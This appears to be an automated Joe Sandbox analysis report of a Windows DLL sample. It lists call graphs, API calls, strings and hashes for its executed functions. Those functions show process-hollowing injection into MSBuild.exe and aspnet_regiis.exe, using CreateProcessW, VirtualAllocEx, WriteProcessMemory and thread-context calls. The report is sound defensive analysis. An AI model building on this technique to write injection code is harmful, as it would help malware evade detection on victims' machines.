14530->14531 14532 6c78c052 14531->14532 14534 6c78bef2 14532->14534 14535 6c78befd 14534->14535 14536 6c78bf0d 14534->14536 14540 6c78bf13 14535->14540 14536->14528 14539 6c78c7a7 ___free_lconv_mon 14 API calls 14539->14536 14541 6c78bf28 14540->14541 14544 6c78bf2e 14540->14544 14542 6c78c7a7 ___free_lconv_mon 14 API calls 14541->14542 14542->14544 14543 6c78c7a7 ___free_lconv_mon 14 API calls 14545 6c78bf3a 14543->14545 14544->14543 14546 6c78c7a7 ___free_lconv_mon 14 API calls 14545->14546 14547 6c78bf45 14546->14547 14548 6c78c7a7 ___free_lconv_mon 14 API calls 14547->14548 14549 6c78bf50 14548->14549 14550 6c78c7a7 ___free_lconv_mon 14 API calls 14549->14550 14551 6c78bf5b 14550->14551 14552 6c78c7a7 ___free_lconv_mon 14 API calls 14551->14552 14553 6c78bf66 14552->14553 14554 6c78c7a7 ___free_lconv_mon 14 API calls 14553->14554 14555 6c78bf71 14554->14555 14556 6c78c7a7 ___free_lconv_mon 14 API calls 14555->14556 14557 6c78bf7c 14556->14557 14558 6c78c7a7 ___free_lconv_mon 14 API calls 14557->14558 14559 6c78bf87 14558->14559 14560 6c78c7a7 ___free_lconv_mon 14 API calls 14559->14560 14561 6c78bf95 14560->14561 14566 6c78bd3f 14561->14566 14567 6c78bd4b __FrameHandler3::FrameUnwindToState 14566->14567 14582 6c78c386 EnterCriticalSection 14567->14582 14569 6c78bd55 14570 6c78bd7f 14569->14570 14573 6c78c7a7 ___free_lconv_mon 14 API calls 14569->14573 14583 6c78bd9e 14570->14583 14573->14570 14574 6c78bdaa 14575 6c78bdb6 __FrameHandler3::FrameUnwindToState 14574->14575 14587 6c78c386 EnterCriticalSection 14575->14587 14577 6c78bdc0 14588 6c78bfe3 14577->14588 14579 6c78bdd3 14592 6c78bdf3 14579->14592 14582->14569 14586 6c78c3ce LeaveCriticalSection 14583->14586 14585 6c78bd8c 14585->14574 14586->14585 14587->14577 14589 6c78c019 __dosmaperr 14588->14589 14590 6c78bff2 __dosmaperr 14588->14590 14589->14579 14590->14589 14595 6c78f03f 14590->14595 14705 6c78c3ce LeaveCriticalSection 14592->14705 14594 6c78bde1 14594->14539 14596 6c78f0bf 14595->14596 14599 6c78f055 14595->14599 14597 6c78f10d 14596->14597 14600 6c78c7a7 ___free_lconv_mon 14 API calls 14596->14600 14663 6c78f1b0 14597->14663 14599->14596 14601 6c78f088 14599->14601 14605 6c78c7a7 ___free_lconv_mon 14 API calls 14599->14605 14602 6c78f0e1 14600->14602 14603 6c78f0aa 14601->14603 14611 6c78c7a7 ___free_lconv_mon 14 API calls 14601->14611 14604 6c78c7a7 ___free_lconv_mon 14 API calls 14602->14604 14607 6c78c7a7 ___free_lconv_mon 14 API calls 14603->14607 14606 6c78f0f4 14604->14606 14610 6c78f07d 14605->14610 14612 6c78c7a7 ___free_lconv_mon 14 API calls 14606->14612 14608 6c78f0b4 14607->14608 14613 6c78c7a7 ___free_lconv_mon 14 API calls 14608->14613 14609 6c78f17b 14614 6c78c7a7 ___free_lconv_mon 14 API calls 14609->14614 14623 6c790fc6 14610->14623 14616 6c78f09f 14611->14616 14617 6c78f102 14612->14617 14613->14596 14618 6c78f181 14614->14618 14651 6c7910c4 14616->14651 14621 6c78c7a7 ___free_lconv_mon 14 API calls 14617->14621 14618->14589 14619 6c78f11b 14619->14609 14622 6c78c7a7 14 API calls ___free_lconv_mon 14619->14622 14621->14597 14622->14619 14624 6c790fd7 14623->14624 14650 6c7910c0 14623->14650 14625 6c790fe8 14624->14625 14626 6c78c7a7 ___free_lconv_mon 14 API calls 14624->14626 14627 6c790ffa 14625->14627 14629 6c78c7a7 ___free_lconv_mon 14 API calls 14625->14629 14626->14625 14628 6c79100c 14627->14628 14630 6c78c7a7 ___free_lconv_mon 14 API calls 14627->14630 14631 6c79101e 14628->14631 14632 6c78c7a7 ___free_lconv_mon 14 API calls 14628->14632 14629->14627 14630->14628 14633 6c791030 14631->14633 14634 6c78c7a7 ___free_lconv_mon 14 API calls 14631->14634 14632->14631 14635 6c791042 14633->14635 14637 6c78c7a7 ___free_lconv_mon 14 API calls 14633->14637 14634->14633 14636 6c791054 14635->14636 14638 6c78c7a7 ___free_lconv_mon 14 API calls 14635->14638 14639 6c791066 14636->14639 14640 6c78c7a7 ___free_lconv_mon 14 API calls 14636->14640 14637->14635 14638->14636 14641 6c791078 14639->14641 14642 6c78c7a7 ___free_lconv_mon 14 API calls 14639->14642 14640->14639 14643 6c78c7a7 ___free_lconv_mon 14 API calls 14641->14643 14647 6c79108a 14641->14647 14642->14641 14643->14647 14644 6c78c7a7 ___free_lconv_mon 14 API calls 14645 6c79109c 14644->14645 14646 6c7910ae 14645->14646 14648 6c78c7a7 ___free_lconv_mon 14 API calls 14645->14648 14649 6c78c7a7 ___free_lconv_mon 14 API calls 14646->14649 14646->14650 14647->14644 14647->14645 14648->14646 14649->14650 14650->14601 14652 6c791129 14651->14652 14653 6c7910d1 14651->14653 14652->14603 14654 6c7910e1 14653->14654 14655 6c78c7a7 ___free_lconv_mon 14 API calls 14653->14655 14656 6c7910f3 14654->14656 14657 6c78c7a7 ___free_lconv_mon 14 API calls 14654->14657 14655->14654 14658 6c791105 14656->14658 14660 6c78c7a7 ___free_lconv_mon 14 API calls 14656->14660 14657->14656 14659 6c791117 14658->14659 14661 6c78c7a7 ___free_lconv_mon 14 API calls 14658->14661 14659->14652 14662 6c78c7a7 ___free_lconv_mon 14 API calls 14659->14662 14660->14658 14661->14659 14662->14652 14664 6c78f1bd 14663->14664 14668 6c78f1dc 14663->14668 14664->14668 14669 6c791152 14664->14669 14667 6c78c7a7 ___free_lconv_mon 14 API calls 14667->14668 14668->14619 14670 6c78f1d6 14669->14670 14671 6c791163 14669->14671 14670->14667 14672 6c79112d __dosmaperr 14 API calls 14671->14672 14673 6c79116b 14672->14673 14674 6c79112d __dosmaperr 14 API calls 14673->14674 14675 6c791176 14674->14675 14676 6c79112d __dosmaperr 14 API calls 14675->14676 14677 6c791181 14676->14677 14678 6c79112d __dosmaperr 14 API calls 14677->14678 14679 6c79118c 14678->14679 14680 6c79112d __dosmaperr 14 API calls 14679->14680 14681 6c79119a 14680->14681 14682 6c78c7a7 ___free_lconv_mon 14 API calls 14681->14682 14683 6c7911a5 14682->14683 14684 6c78c7a7 ___free_lconv_mon 14 API calls 14683->14684 14685 6c7911b0 14684->14685 14686 6c78c7a7 ___free_lconv_mon 14 API calls 14685->14686 14687 6c7911bb 14686->14687 14688 6c79112d __dosmaperr 14 API calls 14687->14688 14689 6c7911c9 14688->14689 14690 6c79112d __dosmaperr 14 API calls 14689->14690 14691 6c7911d7 14690->14691 14692 6c79112d __dosmaperr 14 API calls 14691->14692 14693 6c7911e8 14692->14693 14694 6c79112d __dosmaperr 14 API calls 14693->14694 14695 6c7911f6 14694->14695 14696 6c79112d __dosmaperr 14 API calls 14695->14696 14697 6c791204 14696->14697 14698 6c78c7a7 ___free_lconv_mon 14 API calls 14697->14698 14699 6c79120f 14698->14699 14700 6c78c7a7 ___free_lconv_mon 14 API calls 14699->14700 14701 6c79121a 14700->14701 14702 6c78c7a7 ___free_lconv_mon 14 API calls 14701->14702 14703 6c791225 14702->14703 14704 6c78c7a7 ___free_lconv_mon 14 API calls 14703->14704 14704->14670 14705->14594 14707 6c78950d 14706->14707 14713 6c7882b4 14706->14713 14714 6c789bd3 14707->14714 14710 6c789c0e ___vcrt_FlsSetValue 6 API calls 14711 6c789523 14710->14711 14719 6c7894e7 14711->14719 14713->14416 14715 6c789a72 ___vcrt_FlsGetValue 5 API calls 14714->14715 14716 6c789bed 14715->14716 14717 6c789c05 TlsGetValue 14716->14717 14718 6c789514 14716->14718 14717->14718 14718->14710 14720 6c7894fe 14719->14720 14721 6c7894f1 14719->14721 14720->14713 14721->14720 14722 6c78b9b9 ___std_type_info_destroy_list 14 API calls 14721->14722 14722->14720 14729 6c78953c 14723->14729 14725 6c788290 14725->14439 14726 6c78b928 14725->14726 14727 6c78c1ab __dosmaperr 14 API calls 14726->14727 14728 6c78829c 14727->14728 14728->14442 14728->14443 14730 6c789548 GetLastError 14729->14730 14731 6c789545 14729->14731 14732 6c789bd3 ___vcrt_FlsGetValue 6 API calls 14730->14732 14731->14725 14733 6c78955d 14732->14733 14734 6c7895c2 SetLastError 14733->14734 14735 6c789c0e ___vcrt_FlsSetValue 6 API calls 14733->14735 14742 6c78957c 14733->14742 14734->14725 14736 6c789576 __CreateFrameInfo 14735->14736 14737 6c789c0e ___vcrt_FlsSetValue 6 API calls 14736->14737 14739 6c78959e 14736->14739 14736->14742 14737->14739 14738 6c789c0e ___vcrt_FlsSetValue 6 API calls 14740 6c7895b2 14738->14740 14739->14738 14739->14740 14741 6c78b9b9 ___std_type_info_destroy_list 14 API calls 14740->14741 14741->14742 14742->14734 14743 6c779140 14760 6c779160 __CreateFrameInfo 14743->14760 14744 6c7796a4 14745 6c7796e1 14744->14745 14744->14760 14746 6c779bdd 14745->14746 14745->14760 14747 6c78089a GetConsoleWindow ShowWindow 14746->14747 14750 6c785f10 WriteProcessMemory 14746->14750 14751 6c779dab 14746->14751 14746->14760 14780 6c771340 14747->14780 14749 6c771340 24 API calls 14749->14760 14750->14760 14752 6c7862f8 CloseHandle CloseHandle 14751->14752 14753 6c7849e0 CreateProcessW 14751->14753 14755 6c784e4e WriteProcessMemory 14751->14755 14759 6c77a5f0 14751->14759 14751->14760 14752->14760 14753->14760 14754 6c771030 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14754->14760 14755->14760 14756 6c7870e2 WriteProcessMemory 14757 6c778e10 5 API calls 14756->14757 14758 6c787198 14757->14758 14758->14760 14759->14756 14759->14760 14761 6c786fda WriteProcessMemory 14759->14761 14762 6c784bbd VirtualAlloc 14759->14762 14763 6c78523e WriteProcessMemory 14759->14763 14765 6c7872f2 ReadProcessMemory 14759->14765 14766 6c784d87 VirtualAllocEx 14759->14766 14767 6c784c5f Wow64GetThreadContext 14759->14767 14768 6c786409 14759->14768 14771 6c77c197 14759->14771 14760->14744 14760->14749 14760->14754 14761->14760 14762->14760 14811 6c778e10 14763->14811 14765->14760 14766->14760 14767->14760 14815 6c787c70 14768->14815 14770 6c786413 14771->14760 14772 6c786f91 VirtualAlloc 14771->14772 14773 6c77c1d9 14771->14773 14772->14760 14773->14760 14774 6c786232 WriteProcessMemory Wow64SetThreadContext ResumeThread 14773->14774 14775 6c77c6d5 14773->14775 14774->14760 14775->14760 14776 6c785d81 ReadProcessMemory 14775->14776 14777 6c77c8a3 14775->14777 14776->14760 14777->14760 14803 6c7787a0 14777->14803 14801 6c7713a7 __InternalCxxFrameHandler 14780->14801 14781 6c77861b MapViewOfFile 14781->14801 14782 6c7774f7 K32GetModuleInformation GetModuleFileNameA 14782->14801 14783 6c777926 MapViewOfFile 14783->14801 14784 6c777849 CloseHandle 14784->14801 14785 6c777e65 FindCloseChangeNotification CloseHandle 14785->14801 14786 6c77868f __InternalCxxFrameHandler 14787 6c7786e0 VirtualProtect 14786->14787 14787->14801 14788 6c777f40 CloseHandle 14788->14801 14789 6c777bc0 VirtualProtect 14789->14801 14790 6c778777 CloseHandle 14790->14801 14791 6c778743 CloseHandle CloseHandle 14791->14801 14792 6c7773a9 GetCurrentProcess 14822 6c788870 14792->14822 14794 6c7773d6 GetModuleHandleA 14794->14801 14795 6c7785fd CloseHandle 14795->14801 14796 6c77755e CreateFileA 14796->14801 14797 6c77768e CreateFileMappingA 14797->14801 14798 6c777fa7 14799 6c787c70 _ValidateLocalCookies 5 API calls 14798->14799 14800 6c777fb1 14799->14800 14800->14760 14801->14781 14801->14782 14801->14783 14801->14784 14801->14785 14801->14786 14801->14788 14801->14789 14801->14790 14801->14791 14801->14792 14801->14795 14801->14796 14801->14797 14801->14798 14802 6c777cec VirtualProtect 14801->14802 14802->14801 14806 6c7787bf __CreateFrameInfo 14803->14806 14804 6c778da2 GetModuleHandleW GetProcAddress 14804->14806 14805 6c7789a4 GetModuleHandleW GetProcAddress 14805->14806 14806->14804 14806->14805 14807 6c778a6b NtQueryInformationProcess 14806->14807 14808 6c778d88 14806->14808 14807->14806 14809 6c787c70 _ValidateLocalCookies 5 API calls 14808->14809 14810 6c778d98 VirtualAllocEx 14809->14810 14810->14760 14814 6c778e66 14811->14814 14812 6c787c70 _ValidateLocalCookies 5 API calls 14813 6c779100 14812->14813 14813->14760 14814->14812 14816 6c787c78 14815->14816 14817 6c787c79 IsProcessorFeaturePresent 14815->14817 14816->14770 14819 6c78801e 14817->14819 14824 6c787fe1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14819->14824 14821 6c788101 14821->14770 14823 6c788887 14822->14823 14823->14794 14823->14823 14824->14821

                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                            Function 6C779140 Relevance: 134.1, APIs: 20, Strings: 49, Instructions: 13379injectionmemorythreadCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1823513121.000000006C771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C770000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823473675.000000006C770000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823663685.000000006C794000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823970113.000000006C813000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6c770000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Process$Memory$Write$AllocVirtual$Thread$CloseContextHandleReadWindowWow64$ConsoleCreateResumeShow
                                                                                                                                                                                            • String ID: O#$h|&$h|&$"]@9$"]@9$${4$${4$&HLW$'%;$$,,hK$,>O$-Fd0$-Fd0$4EP$4Sq[$5xCP$9"S\$@$@Za_$@Za_$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$G\bn$K>H$Y')L$^$iE$bm9R$g>=$jV%j$kernel32.dll$m4e$ntdll.dll$nex$oF.5$sHa=$u^K$w*h0$}FF$}^2&$}\:$#b$2n$:kQ$<9.$r^l$r^l$zjm$zjm
                                                                                                                                                                                            • API String ID: 284040131-2197671511
                                                                                                                                                                                            • Opcode ID: 95b671818ef8acfe0fd623e850c266b0b93884f68d03a5837dbd46a8038d40f5
                                                                                                                                                                                            • Instruction ID: 08528facda73ab212e0b36ba9ad94fb1af38fdaf0d83c2c0265de80a2907d77d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 95b671818ef8acfe0fd623e850c266b0b93884f68d03a5837dbd46a8038d40f5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 18341232A422158FCF24CE3CCA953DD77F1AB47354F1052B9E91DABAA4C6359AC98F01
                                                                                                                                                                                            Function 6C771340 Relevance: 75.4, APIs: 19, Strings: 20, Instructions: 7167filememoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1823513121.000000006C771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C770000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823473675.000000006C770000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823663685.000000006C794000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823970113.000000006C813000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6c770000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseHandle$File$ModuleProtectVirtual$Create$ChangeCurrentFindInformationMappingNameNotificationProcessView
                                                                                                                                                                                            • String ID: `It$,Vh$,Vh$@$Ag$C*D$Ere<$Ere<$F(O($P/jU$Qg`~$ihc>$r$c$r$c$ud'I$xl$y+=$y+=$|RD$xi$
                                                                                                                                                                                            • API String ID: 3322835611-3725121427
                                                                                                                                                                                            • Opcode ID: ec2f3f451fc7971540879a5b43deacb91e63ededa1bd68646aa6713bcf62a866
                                                                                                                                                                                            • Instruction ID: 42e49345f6b8e1f0790dd28b6266cb1631a71a63e928784a3565ed18b71fba5b
                                                                                                                                                                                            • Opcode Fuzzy Hash: ec2f3f451fc7971540879a5b43deacb91e63ededa1bd68646aa6713bcf62a866
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4DC32435A40209CFCF24CE7CCA953D977F2AB43315F10866AD819EBBA1C73999899F50
                                                                                                                                                                                            Function 017B0EF8 Relevance: 2.7, Strings: 2, Instructions: 218COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 3622 17b0ef8-17b0f0e 3623 17b0f11-17b0f12 3622->3623 3624 17b0f10 3622->3624 3626 17b0f15-17b0f1a 3623->3626 3627 17b0f14 3623->3627 3624->3623 3625 17b0f1b-17b0f1c 3624->3625 3628 17b0f1d-17b0f1e 3625->3628 3626->3625 3626->3628 3627->3626 3629 17b0f21-17b0f24 3628->3629 3630 17b0f20 3628->3630 3631 17b0f30-17b0f32 3629->3631 3632 17b0f26 3629->3632 3630->3629 3635 17b0f35-17b0f36 3631->3635 3636 17b0f34 3631->3636 3633 17b0f29-17b0f2f 3632->3633 3634 17b0f27-17b0f28 3632->3634 3633->3631 3634->3633 3637 17b0f39-17b0f3a 3635->3637 3638 17b0f38 3635->3638 3636->3635 3640 17b0f3b-17b0f3c 3637->3640 3641 17b0f3d-17b0f3e 3637->3641 3638->3637 3639 17b0f46 3638->3639 3644 17b0f49-17b0f4d 3639->3644 3645 17b0f48 3639->3645 3640->3641 3642 17b0f3f-17b0f40 3641->3642 3643 17b0f41-17b0f42 3641->3643 3642->3643 3646 17b0f4f-17b0f52 3642->3646 3647 17b0f45 3643->3647 3648 17b0f44 3643->3648 3644->3646 3645->3644 3649 17b0f55-17b0f72 3646->3649 3650 17b0f54 3646->3650 3647->3639 3648->3647 3652 17b0f75-17b0f7a 3649->3652 3653 17b0f74 3649->3653 3650->3649 3654 17b0f7d-17b0f7e 3652->3654 3655 17b0f7c 3652->3655 3653->3652 3656 17b0f81-17b0fc5 call 17b00e4 3654->3656 3657 17b0f80 3654->3657 3655->3654 3660 17b0fca 3656->3660 3657->3656 3661 17b0fcf-17b0fe4 3660->3661 3662 17b0fea 3661->3662 3663 17b1103-17b114c call 17b00f4 3661->3663 3662->3660 3662->3663 3664 17b1059-17b106b 3662->3664 3665 17b1093-17b10b0 3662->3665 3666 17b10f3-17b10fe 3662->3666 3667 17b1012-17b1016 3662->3667 3668 17b0ff1-17b0ffd 3662->3668 3669 17b1070-17b108e 3662->3669 3670 17b10d6-17b10db 3662->3670 3671 17b1026-17b1054 3662->3671 3672 17b10b5-17b10d1 3662->3672 3689 17b114e call 17b1eab 3663->3689 3690 17b114e call 17b1bc9 3663->3690 3691 17b114e call 17b1bb9 3663->3691 3692 17b114e call 17b212e 3663->3692 3693 17b114e call 17b228d 3663->3693 3694 17b114e call 17b1afd 3663->3694 3695 17b114e call 17b1b6c 3663->3695 3696 17b114e call 17b1aa1 3663->3696 3697 17b114e call 17b1b50 3663->3697 3698 17b114e call 17b1b10 3663->3698 3699 17b114e call 17b1b27 3663->3699 3700 17b114e call 17b1b97 3663->3700 3664->3661 3665->3661 3666->3661 3673 17b1018-17b101d 3667->3673 3674 17b101f 3667->3674 3685 17b1005-17b1010 3668->3685 3669->3661 3678 17b10e3-17b10ee 3670->3678 3671->3661 3672->3661 3677 17b1024 3673->3677 3674->3677 3677->3661 3678->3661 3685->3661 3688 17b1154-17b115d 3689->3688 3690->3688 3691->3688 3692->3688 3693->3688 3694->3688 3695->3688 3696->3688 3697->3688 3698->3688 3699->3688 3700->3688
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Tefq$Tefq
                                                                                                                                                                                            • API String ID: 0-1395890369
                                                                                                                                                                                            • Opcode ID: 56468eb93a435ddac1ca9cf912716419aa86a1ee337acf1ba413d1ee8f3d0332
                                                                                                                                                                                            • Instruction ID: 56d2017d04a1036f0a7847b7fc284d82061f2d19de94b991966e467aa19d408b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 56468eb93a435ddac1ca9cf912716419aa86a1ee337acf1ba413d1ee8f3d0332
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E71D171B042158FCB4A9F68C8D57EFFBB2FF85300B1584AAE405AF266D7319A01CB91
                                                                                                                                                                                            Function 017B0F98 Relevance: 2.6, Strings: 2, Instructions: 133COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 3701 17b0f98-17b0fc5 call 17b00e4 3704 17b0fca 3701->3704 3705 17b0fcf-17b0fe4 3704->3705 3706 17b0fea 3705->3706 3707 17b1103-17b114c call 17b00f4 3705->3707 3706->3704 3706->3707 3708 17b1059-17b106b 3706->3708 3709 17b1093-17b10b0 3706->3709 3710 17b10f3-17b10fe 3706->3710 3711 17b1012-17b1016 3706->3711 3712 17b0ff1-17b0ffd 3706->3712 3713 17b1070-17b108e 3706->3713 3714 17b10d6-17b10db 3706->3714 3715 17b1026-17b1054 3706->3715 3716 17b10b5-17b10d1 3706->3716 3733 17b114e call 17b1eab 3707->3733 3734 17b114e call 17b1bc9 3707->3734 3735 17b114e call 17b1bb9 3707->3735 3736 17b114e call 17b212e 3707->3736 3737 17b114e call 17b228d 3707->3737 3738 17b114e call 17b1afd 3707->3738 3739 17b114e call 17b1b6c 3707->3739 3740 17b114e call 17b1aa1 3707->3740 3741 17b114e call 17b1b50 3707->3741 3742 17b114e call 17b1b10 3707->3742 3743 17b114e call 17b1b27 3707->3743 3744 17b114e call 17b1b97 3707->3744 3708->3705 3709->3705 3710->3705 3717 17b1018-17b101d 3711->3717 3718 17b101f 3711->3718 3729 17b1005-17b1010 3712->3729 3713->3705 3722 17b10e3-17b10ee 3714->3722 3715->3705 3716->3705 3721 17b1024 3717->3721 3718->3721 3721->3705 3722->3705 3729->3705 3732 17b1154-17b115d 3733->3732 3734->3732 3735->3732 3736->3732 3737->3732 3738->3732 3739->3732 3740->3732 3741->3732 3742->3732 3743->3732 3744->3732
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1818944439.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_17b0000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Tefq$Tefq
                                                                                                                                                                                            • API String ID: 0-1395890369
                                                                                                                                                                                            • Opcode ID: a51add261e2416566a898d0709b043162b3d1c3f7035e443cf8da1db47e540b0
                                                                                                                                                                                            • Instruction ID: aa0f73e94ea791de7d146ed055ce904a0f970c92793969c770ece53e58f5275b
                                                                                                                                                                                            • Opcode Fuzzy Hash: a51add261e2416566a898d0709b043162b3d1c3f7035e443cf8da1db47e540b0
                                                                                                                                                                                            • Instruction Fuzzy Hash: FD41A031B101198FCB149B69C9956AFFBF7FB88301F11856AE506EB3A4CB319E058B91
                                                                                                                                                                                            Function 6C787DD8 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 3483 6c787dd8-6c787deb call 6c788630 3486 6c787ded-6c787def 3483->3486 3487 6c787df1-6c787e13 call 6c788220 3483->3487 3489 6c787e5a-6c787e69 3486->3489 3491 6c787e80-6c787e99 call 6c7884ba call 6c788630 3487->3491 3492 6c787e15-6c787e58 call 6c7882eb call 6c7881a7 call 6c788603 call 6c787e6d call 6c78848c call 6c787e7a 3487->3492 3503 6c787eaa-6c787eb1 3491->3503 3504 6c787e9b-6c787ea1 3491->3504 3492->3489 3507 6c787ebd-6c787ed1 dllmain_raw 3503->3507 3508 6c787eb3-6c787eb6 3503->3508 3504->3503 3506 6c787ea3-6c787ea5 3504->3506 3510 6c787f83-6c787f92 3506->3510 3513 6c787f7a-6c787f81 3507->3513 3514 6c787ed7-6c787ee8 dllmain_crt_dispatch 3507->3514 3508->3507 3511 6c787eb8-6c787ebb 3508->3511 3515 6c787eee-6c787f00 call 6c787380 3511->3515 3513->3510 3514->3513 3514->3515 3521 6c787f29-6c787f2b 3515->3521 3522 6c787f02-6c787f04 3515->3522 3525 6c787f2d-6c787f30 3521->3525 3526 6c787f32-6c787f43 dllmain_crt_dispatch 3521->3526 3522->3521 3524 6c787f06-6c787f24 call 6c787380 call 6c787dd8 dllmain_raw 3522->3524 3524->3521 3525->3513 3525->3526 3526->3513 3528 6c787f45-6c787f77 dllmain_raw 3526->3528 3528->3513
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __RTC_Initialize.LIBCMT ref: 6C787E1F
                                                                                                                                                                                            • ___scrt_uninitialize_crt.LIBCMT ref: 6C787E39
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.1823513121.000000006C771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C770000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823473675.000000006C770000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823663685.000000006C794000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.1823970113.000000006C813000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6c770000_HM3SOlbpH71yEXUIEAOeIiGX.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2442719207-0
                                                                                                                                                                                            • Opcode ID: fe5fe32ff381cb7fef8f326e544e4c834207d601a7697e59c3ceb6430ae512da
                                                                                                                                                                                            • Instruction ID: 3f5914126b08f71187cac84c84a97ee02950b38fe6acbe583f63d808d2ed52bc
                                                                                                                                                                                            • Opcode Fuzzy Hash: fe5fe32ff381cb7fef8f326e544e4c834207d601a7697e59c3ceb6430ae512da
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1241E932F07215ABDB208F99CA48B9E7B75EB40798F114136FA1667B50D7304D45DBA0
                                                                                                                                                                                            Function 6C787E88 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
